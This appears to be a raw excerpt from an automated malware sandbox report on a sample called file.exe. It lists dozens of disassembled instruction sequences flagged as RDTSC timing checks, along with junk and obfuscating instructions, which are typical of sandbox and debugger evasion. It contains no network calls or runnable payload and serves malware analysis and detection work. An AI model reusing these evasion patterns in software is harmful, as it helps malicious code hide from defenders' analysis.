                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCDB second address: 70DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCE1 second address: 70DCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70DCFA second address: 70DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD0F8CDABEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714917 second address: 714921 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD0F8E1A7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714921 second address: 714927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D25 second address: 713D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713EAF second address: 713EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jno 00007FD0F8CDABE6h 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7145CB second address: 7145E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD0F8E1A7ADh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7145E0 second address: 7145EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71476F second address: 714775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714775 second address: 71477F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71477F second address: 714794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD0F8E1A7AFh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714794 second address: 7147A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D92 second address: 715DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EA4 second address: 715EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EA8 second address: 715EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715EAE second address: 715EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716087 second address: 716090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D1C second address: 716D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D26 second address: 716D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717E7B second address: 717ED0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FD0F8CDABEAh 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD0F8CDABE8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D29DFh] 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b mov dword ptr [ebp+122D1835h], edi 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 mov esi, 252D9022h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717ED0 second address: 717ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717ED6 second address: 717EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718DD6 second address: 718DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71984B second address: 7198C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 pushad 0x00000009 movzx edx, dx 0x0000000c jl 00007FD0F8CDABFBh 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FD0F8CDABE8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jg 00007FD0F8CDABEEh 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D2DD7h], ebx 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FD0F8CDABEDh 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7198C1 second address: 7198CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A397 second address: 71A39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A39C second address: 71A3F6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0F8E1A7ACh 0x00000008 js 00007FD0F8E1A7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add esi, dword ptr [ebp+12484AF8h] 0x00000017 jmp 00007FD0F8E1A7B7h 0x0000001c push 00000000h 0x0000001e call 00007FD0F8E1A7B8h 0x00000023 mov esi, dword ptr [ebp+122D2BDBh] 0x00000029 pop esi 0x0000002a push 00000000h 0x0000002c movzx esi, si 0x0000002f xchg eax, ebx 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A3F6 second address: 71A3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE4F second address: 71AE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AC19 second address: 71AC28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEBh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE54 second address: 71AE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AE63 second address: 71AEBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FD0F8CDABEFh 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD0F8CDABF9h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AEBC second address: 71AF36 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnp 00007FD0F8E1A7ACh 0x0000000e mov dword ptr [ebp+122D1835h], edi 0x00000014 mov edi, dword ptr [ebp+122D1BE4h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD0F8E1A7A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jng 00007FD0F8E1A7ACh 0x0000003c sbb esi, 705AF71Fh 0x00000042 push 00000000h 0x00000044 call 00007FD0F8E1A7B7h 0x00000049 mov esi, dword ptr [ebp+122D2B63h] 0x0000004f pop edi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jc 00007FD0F8E1A7ACh 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2C1 second address: 71C2C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2C7 second address: 71C2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2CD second address: 71C2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C2D1 second address: 71C2D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD35 second address: 71DD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71DD3F second address: 71DD43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F302 second address: 71F323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD0F8CDABFAh 0x0000000d jmp 00007FD0F8CDABEEh 0x00000012 jnp 00007FD0F8CDABE6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F323 second address: 71F349 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD0F8E1A7ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD0F8E1A7B4h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721F73 second address: 721F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225E7 second address: 7225EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225EB second address: 7225EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72270A second address: 72270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248BA second address: 7248C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72270F second address: 722715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7258F1 second address: 7258F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7248C0 second address: 7248C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7258F7 second address: 725904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FD0F8CDABE6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725B01 second address: 725B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725B07 second address: 725B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7278C5 second address: 7278CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728918 second address: 72891C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72891C second address: 728957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ACh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FD0F8E1A7B3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B3D second address: 727B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728957 second address: 72895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B41 second address: 727B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72895C second address: 7289B9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2DF6h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FD0F8E1A7A8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov di, cx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FD0F8E1A7A8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B50 second address: 727B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289B9 second address: 7289BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B55 second address: 727B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289BE second address: 7289C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B5B second address: 727B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289C4 second address: 7289C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728C02 second address: 728C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FD0F8CDABE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299DD second address: 7299E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299E6 second address: 7299F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299F7 second address: 729A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B808 second address: 72B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D2DF6h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD0F8CDABE8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2159h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FD0F8CDABE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, ebx 0x00000051 mov edi, dword ptr [ebp+122D21FBh] 0x00000057 or dword ptr [ebp+122D380Eh], edi 0x0000005d xchg eax, esi 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 ja 00007FD0F8CDABE6h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B882 second address: 72B897 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jbe 00007FD0F8E1A7C3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D7E6 second address: 72D7EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72CAA7 second address: 72CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72BAB5 second address: 72BAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731A75 second address: 731A9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0F8E1A7B0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD0F8E1A7ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731A9C second address: 731AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1245F5DAh], edx 0x00000010 push 00000000h 0x00000012 sbb di, EC51h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+1245F5DAh], ecx 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 push ebx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop ebx 0x00000025 push eax 0x00000026 jg 00007FD0F8CDABE6h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD0F8CDABF4h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731AEE second address: 731AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72EA97 second address: 72EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 735765 second address: 73576C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739B50 second address: 739B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8CDABE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739B5F second address: 739B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73941B second address: 739429 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739429 second address: 73943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnc 00007FD0F8E1A7A6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73943E second address: 73944B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73944B second address: 739451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7395BE second address: 7395C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7395C2 second address: 7395E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FD0F8E1A7AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
